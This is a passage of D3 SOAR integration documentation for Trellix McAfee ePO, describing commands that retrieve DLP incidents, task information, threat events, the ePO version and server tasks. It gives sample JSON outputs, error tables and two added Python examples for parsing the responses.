        "UDLP_Incidents.RulesToDisplay": "Plug and Play Device Rule",
        "UDLP_Incidents.PolicyInfoId": 4,
        "UDLP_Incidents.SourceApplicationId": null,
        "UDLP_Incidents.UserID": *****,
        "UDLP_Incidents.Severity": 1,
        "UDLP_Incidents.StatusId": "2",
        "UDLP_Incidents.ResolutionId": "1",
        "UDLP_Incidents.ActualAction": 0,
        "UDLP_Incidents.ExpectedAction": 0,
        "UDLP_Incidents.FailureReason": 0,
        "UDLP_Incidents.JustificationText": "",
        "UDLP_Incidents.McAfeeAgentGuid": "*****-*****-*****-*****-*****",
        "UDLP_Incidents.EvidenceCount": 0,
        "UDLP_Incidents.ReportingProduct": 1,
        "UDLP_Incidents.destination": "***** drives",
        "UDLP_Incidents.ShortMatchString": "",
        "UDLP_Incidents.DestinationUserID": null,
        "UDLP_Incidents.ExternalId": null,
        "UDLP_Incidents.ActivityEnum": null,
        "UDLP_EventUsers.PrimaryUserAccountID": "*****-PC5\\Administrator@",
        "UDLP_EventUsers.Username_NTLM": "*****-PC5\\Administrator",
        "UDLP_EventUsers.FQDN": null,
        "UDLP_EventUsers.SID": null,
        "UDLP_EventUsers.UID": null,
        "UDLP_EventUsers.UserOU": "",
        "UDLP_EventUsers.FirstName": null,
        "UDLP_EventUsers.LastName": null,
        "UDLP_EventUsers.PrimaryEmailAddress": "",
        "UDLP_EventUsers.UserTitle": "",
        "UDLP_EventUsers.UserBusinessUnit": null,
        "UDLP_EventUsers.UserDepartment": "",
        "UDLP_EventUsers.UserCity": null,
        "UDLP_EventUsers.UserCountry": null,
        "UDLP_EventUsers.UserCompany": null,
        "UDLP_EventUsers.UserManagerAccountID": "",
        "UDLP_EventUsers.DLPReviewerUserAccount": null,
        "UDLP_EventUsers.Custom1": null,
        "UDLP_EventUsers.Custom2": null,
        "UDLP_EventUsers.Custom3": null,
        "UDLP_EventUsers.UserStatus": null,
        "UDLP_EventUsers.LastDayInOffice": null,
        "UDLP_EventUsers.LastDayInOfficeYYYYMM": null,
        "UDLP_EventUsers.LastUpdated": null,
        "UDLP_EventUsers.LastUpdatedBy": null,
        "UDLP_EventUsers.LastUpdatedMethod": null,
        "UDLP_EventUsers.UserGroups": "Administrators"
    }
]
Context Data

The data extracted from Raw Data and converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "UDLP_Incidents.IncidentId": *****,
        "UDLP_EventUsers.UserName": "Administrator",
        "UDLP_Incidents.ComputerID": 2,
        "UDLP_EventComputers.Name": "*****-PC5",
        "UDLP_EventComputers.IP": "1.1.1.1",
        "UDLP_Incidents.IncidentType": 10000,
        "UDLP_Incidents.ViolationLocalTime": "2021-05-05T14:01:39-07:00",
        "UDLP_Incidents.ViolationTimezone": "Pacific Daylight Time",
        "UDLP_IncidentStatuses.StatusKey": "NEW",
        "UDLP_Incidents.TotalMatchCount": 0,
        "UDLP_Incidents.TotalContentSize": 0,
        "UDLP_Incidents.RulesToDisplay": "Plug and Play Device Rule",
        "UDLP_Incidents.PolicyInfoId": 4,
        "UDLP_Incidents.SourceApplicationId": null,
        "UDLP_Incidents.UserID": *****,
        "UDLP_Incidents.Severity": 1,
        "UDLP_Incidents.StatusId": "2",
        "UDLP_Incidents.ResolutionId": "1",
        "UDLP_Incidents.ActualAction": 0,
        "UDLP_Incidents.ExpectedAction": 0,
        "UDLP_Incidents.FailureReason": 0,
        "UDLP_Incidents.JustificationText": "",
        "UDLP_Incidents.McAfeeAgentGuid": "*****-*****-*****-*****-*****",
        "UDLP_Incidents.EvidenceCount": 0,
        "UDLP_Incidents.ReportingProduct": 1,
        "UDLP_Incidents.destination": "***** drives",
        "UDLP_Incidents.ShortMatchString": "",
        "UDLP_Incidents.DestinationUserID": null,
        "UDLP_Incidents.ExternalId": null,
        "UDLP_Incidents.ActivityEnum": null,
        "UDLP_EventUsers.PrimaryUserAccountID": "*****-PC5\\Administrator@",
        "UDLP_EventUsers.Username_NTLM": "*****-PC5\\Administrator",
        "UDLP_EventUsers.FQDN": null,
        "UDLP_EventUsers.SID": null,
        "UDLP_EventUsers.UID": null,
        "UDLP_EventUsers.UserOU": "",
        "UDLP_EventUsers.FirstName": null,
        "UDLP_EventUsers.LastName": null,
        "UDLP_EventUsers.PrimaryEmailAddress": "",
        "UDLP_EventUsers.UserTitle": "",
        "UDLP_EventUsers.UserBusinessUnit": null,
        "UDLP_EventUsers.UserDepartment": "",
        "UDLP_EventUsers.UserCity": null,
        "UDLP_EventUsers.UserCountry": null,
        "UDLP_EventUsers.UserCompany": null,
        "UDLP_EventUsers.UserManagerAccountID": "",
        "UDLP_EventUsers.DLPReviewerUserAccount": null,
        "UDLP_EventUsers.Custom1": null,
        "UDLP_EventUsers.Custom2": null,
        "UDLP_EventUsers.Custom3": null,
        "UDLP_EventUsers.UserStatus": null,
        "UDLP_EventUsers.LastDayInOffice": null,
        "UDLP_EventUsers.LastDayInOfficeYYYYMM": null,
        "UDLP_EventUsers.LastUpdated": null,
        "UDLP_EventUsers.LastUpdatedBy": null,
        "UDLP_EventUsers.LastUpdatedMethod": null,
        "UDLP_EventUsers.UserGroups": "Administrators"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "IncidentIds": "\"[27,26]\"",
    "IncidentTypes": "\"[10000,10000]\"",
    "ComputerNames": "\"[\\\"*****-PC5\\\",\\\"EPO-*****\\\"]\"",
    "ComputerIPs": "\"[\\\"1.1.1.1\\\",\\\"1.1.1.1\\\"]\"",
    "ViolationLocalTimes": "\"[\\\"2021-05-05T14:01:39-07:00\\\",\\\"2021-05-05T12:24:20-07:00\\\"]\"",
    "UserNames": "\"[\\\"Administrator\\\",\\\"Administrator\\\"]\"",
    "Severities": "\"[\\\"warning\\\",\\\"major\\\"]\"",
    "ActualActions": "\"[0,0]\"",
    "ExpectedActions": "\"[0,0]\"",
    "StatusKeys": "\"[\\\"NEW\\\",\\\"NEW\\\"]\""
}
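The Key Fields values above are JSON arrays that have been string-encoded twice, and each field is a parallel array with one entry per incident. The following added Python example (not part of the D3 documentation or product code) decodes them and rebuilds one record per incident; the host names in the sample and the per-incident names in FIELD_MAP are assumptions made for the example.

```python
import json

# Constructed sample shaped like the Key Fields sample above; the masked
# host names are replaced with made-up ones so the JSON parses.
KEY_FIELDS_JSON = r'''
{
    "IncidentIds": "\"[27,26]\"",
    "ComputerNames": "\"[\\\"LAB-PC5\\\",\\\"EPO-LAB\\\"]\"",
    "ComputerIPs": "\"[\\\"1.1.1.1\\\",\\\"1.1.1.1\\\"]\"",
    "UserNames": "\"[\\\"Administrator\\\",\\\"Administrator\\\"]\"",
    "Severities": "\"[\\\"warning\\\",\\\"major\\\"]\"",
    "ActualActions": "\"[0,0]\"",
    "ExpectedActions": "\"[0,0]\"",
    "StatusKeys": "\"[\\\"NEW\\\",\\\"NEW\\\"]\""
}
'''

# Hypothetical per-incident names for the plural Key Field names.
FIELD_MAP = {
    "IncidentIds": "incident_id",
    "ComputerNames": "computer_name",
    "ComputerIPs": "computer_ip",
    "UserNames": "user_name",
    "Severities": "severity",
    "ActualActions": "actual_action",
    "ExpectedActions": "expected_action",
    "StatusKeys": "status_key",
}


def decode_key_field(value, max_depth=3):
    """Unwrap a value that was JSON-encoded more than once.

    Stops as soon as the value is no longer a string or no longer parses,
    so an ordinary string such as "NEW" is returned unchanged.
    """
    for _ in range(max_depth):
        if not isinstance(value, str):
            break
        try:
            value = json.loads(value)
        except json.JSONDecodeError:
            break
    return value


def key_fields_to_incidents(key_fields, field_map=FIELD_MAP):
    """Turn the parallel Key Field arrays into one dict per incident."""
    columns = {}
    for source_name, row_name in field_map.items():
        if source_name not in key_fields:
            continue
        decoded = decode_key_field(key_fields[source_name])
        if not isinstance(decoded, list):
            raise ValueError(f"{source_name} did not decode to a list: {decoded!r}")
        columns[row_name] = decoded

    lengths = {name: len(values) for name, values in columns.items()}
    if len(set(lengths.values())) > 1:
        # Arrays of different length cannot be paired up by position.
        raise ValueError(f"Key Field arrays differ in length: {lengths}")

    names = list(columns)
    return [dict(zip(names, row)) for row in zip(*columns.values())]


def incidents_with_severity(incidents, wanted):
    """Return the incident_id of every incident whose severity is in `wanted`."""
    return [i["incident_id"] for i in incidents if i["severity"] in wanted]


if __name__ == "__main__":
    rows = key_fields_to_incidents(json.loads(KEY_FIELDS_JSON))
    for row in rows:
        print(row)
    print(incidents_with_severity(rows, {"major"}))
```

Rejecting arrays of unequal length keeps a truncated or masked field from silently pairing a host with the wrong incident.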
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

UDLP_INCIDENTS.INCIDENTID

UDLP_EVENTUSERS.USERNAME

UDLP_INCIDENTS.COMPUTERID

UDLP_EVENTCOMPUTERS.NAME

UDLP_EVENTCOMPUTERS.IP

UDLP_INCIDENTS.INCIDENTTYPE

UDLP_INCIDENTS.VIOLATIONLOCALTIME

UDLP_INCIDENTS.VIOLATIONTIMEZONE

UDLP_INCIDENTSTATUSES.STATUSKEY

UDLP_INCIDENTS.TOTALMATCHCOUNT

UDLP_INCIDENTS.TOTALCONTENTSIZE

UDLP_INCIDENTS.RULESTODISPLAY

UDLP_INCIDENTS.POLICYINFOID

UDLP_INCIDENTS.SOURCEAPPLICATIONID

UDLP_INCIDENTS.USERID

UDLP_INCIDENTS.SEVERITY

UDLP_INCIDENTS.STATUSID

UDLP_INCIDENTS.RESOLUTIONID

UDLP_INCIDENTS.ACTUALACTION

UDLP_INCIDENTS.EXPECTEDACTION

UDLP_INCIDENTS.FAILUREREASON

UDLP_INCIDENTS.JUSTIFICATIONTEXT

UDLP_INCIDENTS.MCAFEEAGENTGUID

UDLP_INCIDENTS.EVIDENCECOUNT

UDLP_INCIDENTS.REPORTINGPRODUCT

UDLP_INCIDENTS.DESTINATION

UDLP_INCIDENTS.SHORTMATCHSTRING

UDLP_INCIDENTS.DESTINATIONUSERID

UDLP_INCIDENTS.EXTERNALID

UDLP_INCIDENTS.ACTIVITYENUM

UDLP_EVENTUSERS.PRIMARYUSERACCOUNTID

UDLP_EVENTUSERS.USERNAME_NTLM

UDLP_EVENTUSERS.FQDN

UDLP_EVENTUSERS.SID

UDLP_EVENTUSERS.UID

UDLP_EVENTUSERS.USEROU

UDLP_EVENTUSERS.FIRSTNAME

UDLP_EVENTUSERS.LASTNAME

UDLP_EVENTUSERS.PRIMARYEMAILADDRESS

UDLP_EVENTUSERS.USERTITLE

UDLP_EVENTUSERS.USERBUSINESSUNIT

UDLP_EVENTUSERS.USERDEPARTMENT

UDLP_EVENTUSERS.USERCITY

UDLP_EVENTUSERS.USERCOUNTRY

UDLP_EVENTUSERS.USERCOMPANY

UDLP_EVENTUSERS.USERMANAGERACCOUNTID

UDLP_EVENTUSERS.DLPREVIEWERUSERACCOUNT

UDLP_EVENTUSERS.CUSTOM1

UDLP_EVENTUSERS.CUSTOM2

UDLP_EVENTUSERS.CUSTOM3

UDLP_EVENTUSERS.USERSTATUS

UDLP_EVENTUSERS.LASTDAYINOFFICE

UDLP_EVENTUSERS.LASTDAYINOFFICEYYYYMM

UDLP_EVENTUSERS.LASTUPDATED

UDLP_EVENTUSERS.LASTUPDATEDBY

UDLP_EVENTUSERS.LASTUPDATEDMETHOD

UDLP_EVENTUSERS.USERGROUPS

27

Administrator

2

***-PC5

1.1.1.1

10000

5/5/2021 2:01:39 PM

Pacific Daylight Time

NEW

0

0

Plug and Play Device Rule

4

1***

1

2

1

0

0

0

***-***-***-***-***

0

1

***es

***-PC5\Administrator@

***-PC5\Administrator

Administrators

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get DLP Incident failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Get DLP Incident failed.

Status Code: 401.

Message: Unauthorized.

Get Task Info By Product Object

Retrieves task information based on the provided product name and object name.

Input

| Input Parameter | Required/Optional | Description | Example |
| --- | --- | --- | --- |
| Product Name | Required | The name of the product to retrieve task information. | Endpoint Security Threat Prevention |
| Object Name | Required | The name of the object to retrieve task information. | On-Demand Scan - Quick Scan |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "productId": "*****",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Full Scan",
        "typeId": *****,
        "objectId": *****,
        "productName": "Endpoint Security Threat Prevention "
    }
]
Context Data

The data extracted from Raw Data and converted into JSON format. Context Data may be identical to Raw Data in some cases.

D3 customizes the context data by extracting the "productId" and "objectId" fields.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "productId": "*****",
    "objectId": *****
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "productId": "\"*****\"",
    "objectId": "\"*****\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

productName

Endpoint Security Threat Prevention

objectName

On-Demand Scan - Quick Scan

productId

***

objectId

***

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get Task Info By Product Object failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 404. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Can not get Task info by given productName and objectName. |

Error Sample Data

Get Task Info By Product Object failed.

Status Code: 404.

Message: Can not get Task info by given productName and objectName.

Get Threat Events

Retrieves threat events based on the specified criteria.

Input

| Input Parameter | Required/Optional | Description | Example |
| --- | --- | --- | --- |
| Event Time | Optional | The timestamp to retrieve events, in UTC time. | 2019-11-24 00:00 |
| Time Before | Optional | The amount of time prior to the specified event time to retrieve events. | -3d |
| Time After | Optional | The amount of time after the specified event time to retrieve events. | 2d |
| IP Addresses | Optional | The IP addresses to retrieve relevant events. | ["1.1.1.1"] |
| Unhandled or All Threats? | Optional | The option to retrieve only unhandled threats or all threats. | unhandled |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "1.1.1.1": {
            "results": [
                {
                    "ReceivedUTC": "2019-11-25T16:03:54-08:00",
                    "DetectedUTC": "2019-11-25T16:02:33-08:00",
                    "AutoID": *****,
                    "SourceIPV4": "1.1.1.1",
                    "SourceUserName": null,
                    "SourceURL": null,
                    "TargetHostName": "*****-DC",
                    "TargetIPV4": "1.0.0.0",
                    "TargetUserName": "administrator",
                    "TargetPort": null,
                    "TargetProtocol": null,
                    "TargetProcessName": null,
                    "TargetFileName": null,
                    "ThreatCategory": "av.*****",
                    "ThreatEventID": *****,
                    "ThreatSeverity": 2,
                    "ThreatName": "PS/*****",
                    "ThreatType": "*****",
                    "ThreatActionTaken": "*****",
                    "ThreatHandled": false,
                    "AnalyzerDetectionMethod": "*****",
                    "Raw": "{'ReceivedUTC': '2019-11-25T16:03:54-08:00', 'DetectedUTC': '2019-11-25T16:02:33-08:00'}"
                }
            ]
        }
    }
]
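In the Raw Data sample above, results are nested under the queried IP address, and the ReceivedUTC and DetectedUTC values carry a -08:00 offset despite their names. The following added Python example (not D3 or Trellix code) flattens that structure, normalizes both timestamps to UTC, and separates unhandled events; the sample events and the output field names are constructed for the example.

```python
import json
from datetime import datetime, timezone

# Constructed sample in the shape of the Raw Data sample above; masked
# values are replaced with made-up ones and a second, handled event is added.
RAW_DATA = json.loads('''
[
  {
    "1.1.1.1": {
      "results": [
        {
          "ReceivedUTC": "2019-11-25T16:03:54-08:00",
          "DetectedUTC": "2019-11-25T16:02:33-08:00",
          "AutoID": 101,
          "SourceIPV4": "1.1.1.1",
          "TargetHostName": "LAB-DC",
          "TargetIPV4": "1.0.0.0",
          "TargetUserName": "administrator",
          "ThreatSeverity": 2,
          "ThreatName": "EXAMPLE/Threat-A",
          "ThreatHandled": false
        },
        {
          "ReceivedUTC": "2019-11-25T18:10:00-08:00",
          "DetectedUTC": "2019-11-25T18:00:00-08:00",
          "AutoID": 102,
          "SourceIPV4": "1.1.1.1",
          "TargetHostName": "LAB-DC",
          "TargetIPV4": "1.0.0.0",
          "TargetUserName": "administrator",
          "ThreatSeverity": 2,
          "ThreatName": "EXAMPLE/Threat-B",
          "ThreatHandled": true
        }
      ]
    }
  }
]
''')


def to_utc(timestamp):
    """Parse an ISO 8601 timestamp and convert it to UTC."""
    parsed = datetime.fromisoformat(timestamp)
    if parsed.tzinfo is None:
        # Assumption: a value without an offset is already UTC.
        parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed.astimezone(timezone.utc)


def flatten_threat_events(raw_data):
    """Return one flat record per event, oldest detection first."""
    events = []
    for per_ip in raw_data:
        for queried_ip, body in per_ip.items():
            for item in body.get("results") or []:
                detected = to_utc(item["DetectedUTC"])
                received = to_utc(item["ReceivedUTC"])
                events.append({
                    "queried_ip": queried_ip,
                    "auto_id": item.get("AutoID"),
                    "threat_name": item.get("ThreatName"),
                    "target_host": item.get("TargetHostName"),
                    "severity": item.get("ThreatSeverity"),
                    # Anything other than an explicit true counts as unhandled.
                    "handled": item.get("ThreatHandled") is True,
                    "detected_utc": detected,
                    "received_utc": received,
                    # Time between detection on the endpoint and receipt by ePO.
                    "report_delay_seconds": int((received - detected).total_seconds()),
                })
    return sorted(events, key=lambda e: e["detected_utc"])


def unhandled_events(events):
    """Keep only the events that still need an analyst's attention."""
    return [e for e in events if not e["handled"]]


if __name__ == "__main__":
    for event in unhandled_events(flatten_threat_events(RAW_DATA)):
        print(event["detected_utc"].isoformat(), event["target_host"],
              event["threat_name"], f'{event["report_delay_seconds"]}s')
```

After normalization the first event's detection time is 2019-11-26T00:02:33 UTC, a different calendar day from the local value, which matters when comparing results against a UTC Event Time input.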
Context Data

The data extracted from Raw Data and converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "1.1.1.1": {
            "results": [
                {
                    "ReceivedUTC": "2019-11-25T16:03:54-08:00",
                    "DetectedUTC": "2019-11-25T16:02:33-08:00",
                    "AutoID": *****,
                    "SourceIPV4": "1.1.1.1",
                    "SourceUserName": null,
                    "SourceURL": null,
                    "TargetHostName": "*****-DC",
                    "TargetIPV4": "1.0.0.0",
                    "TargetUserName": "administrator",
                    "TargetPort": null,
                    "TargetProtocol": null,
                    "TargetProcessName": null,
                    "TargetFileName": null,
                    "ThreatCategory": "av.*****",
                    "ThreatEventID": *****,
                    "ThreatSeverity": 2,
                    "ThreatName": "PS/*****",
                    "ThreatType": "*****",
                    "ThreatActionTaken": "*****",
                    "ThreatHandled": false,
                    "AnalyzerDetectionMethod": "*****",
                    "Raw": "{'ReceivedUTC': '2019-11-25T16:03:54-08:00', 'DetectedUTC': '2019-11-25T16:02:33-08:00'}"
                }
            ]
        }
    }
]
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

1.1.1.1

{
"results": [
{
"ReceivedUTC": "2019-11-25T16:03:54-08:00",
"DetectedUTC": "2019-11-25T16:02:33-08:00",
"AutoID": *****,
"SourceIPV4": "1.0.0.0",
"SourceUserName": null,
"SourceURL": null,
"TargetHostName": "*****-DC",
"TargetIPV4": "1.1.1.1",
"TargetUserName": "administrator",
"TargetPort": null,
"TargetProtocol": null,
"TargetProcessName": null,
"TargetFileName": null,
"ThreatCategory": "av.*****",
"ThreatEventID": *****,
"ThreatSeverity": 2,
"ThreatName": "PS/*****",
"ThreatType": "******",
"ThreatActionTaken": "****",
"ThreatHandled": false,
"AnalyzerDetectionMethod": "*****",
"Raw": "{'ReceivedUTC': '2019-11-25T16:03:54-08:00', 'DetectedUTC': '2019-11-25T16:02:33-08:00'}"
}
]
}

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get Threat Events failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Get Threat Events failed.

Status Code: 401.

Message: Unauthorized.

Get Version

Retrieves the ePO version.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
No Sample Data
Context Data

The data extracted from Raw Data and converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
No Sample Data
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
No Sample Data

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get Version failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Get Version failed.

Status Code: 401.

Message: Unauthorized.

List All Server Task

Retrieves a list of all server tasks.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "id": *****,
        "name": "Update Master Repository",
        "description": "This default task updates the master repository from the McAfee update site (McAfeeHttp).",
        "startDate": "2018-02-14T00:00:01-08:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T01:41:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": *****,
        "name": "TIE Server Telemetry",
        "description": "TIE Server telemetry process to collect and transmit data from remote points.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": *****,
        "name": "TIE Server Synchronize Topology",
        "description": "It manages the synchronization of the TIE Server Topology in a multi-ePO environment.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": ******,
        "name": "TIE Server Synchronize CA",
        "description": "It manages the synchronization of the TIE Server CAs in a multi-ePO environment.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    }
]
Context Data

The data extracted from Raw Data and converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "id": *****,
        "name": "Update Master Repository",
        "description": "This default task updates the master repository from the McAfee update site (McAfeeHttp).",
        "startDate": "2018-02-14T00:00:01-08:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T01:41:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": *****,
        "name": "TIE Server Telemetry",
        "description": "TIE Server telemetry process to collect and transmit data from remote points.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": *****,
        "name": "TIE Server Synchronize Topology",
        "description": "It manages the synchronization of the TIE Server Topology in a multi-ePO environment.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": ******,
        "name": "TIE Server Synchronize CA",
        "description": "It manages the synchronization of the TIE Server CAs in a multi-ePO environment.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\\"id\\\":*****,\\\"name\\\":\\\"Update Master Repository\\\",\\\"description\\\":\\\"This default task updates the Master Repository from the McAfee update site (McAfeeHttp).\\\",\\\"startDate\\\":\\\"2022-04-21T03:00:01-04:00\\\",\\\"endDate\\\":\\\"None\\\",\\\"nextRunTime\\\":\\\"2022-12-16T03:09:00-05:00\\\",\\\"enabled\\\":true,\\\"valid\\\":true},{\\\"id\\\":*****,\\\"name\\\":\\\"TIE Server Telemetry\\\",\\\"description\\\":\\\"TIE Server telemetry process to collect and transmit data from remote points.\\\",\\\"startDate\\\":\\\"2022-04-22T03:00:01-04:00\\\",\\\"endDate\\\":\\\"None\\\",\\\"nextRunTime\\\":\\\"2022-12-16T03:15:00-05:00\\\",\\\"enabled\\\":true,\\\"valid\\\":true},{\\\"id\\\":*****,\\\"name\\\":\\\"TIE Server Synchronize Topology\\\",\\\"description\\\":\\\"It manages the synchronization of the TIE Server Topology in a multi-ePO environment.\\\",\\\"startDate\\\":\\\"2022-04-22T03:00:01-04:00\\\",\\\"endDate\\\":\\\"None\\\",\\\"nextRunTime\\\":\\\"2022-12-16T03:15:00-05:00\\\",\\\"enabled\\\":true,\\\"valid\\\":true},{\\\"id\\\":*****,\\\"name\\\":\\\"TIE Server Synchronize CA\\\",\\\"description\\\":\\\"It manages the synchronization of the TIE Server CAs in a multi-ePO environment.\\\",\\\"startDate\\\":\\\"2022-04-22T03:00:01-04:00\\\",\\\"endDate\\\":\\\"None\\\",\\\"nextRunTime\\\":\\\"2022-12-16T03:15:00-05:00\\\",\\\"enabled\\\":true,\\\"valid\\\":true}}]\\r\\n\"",
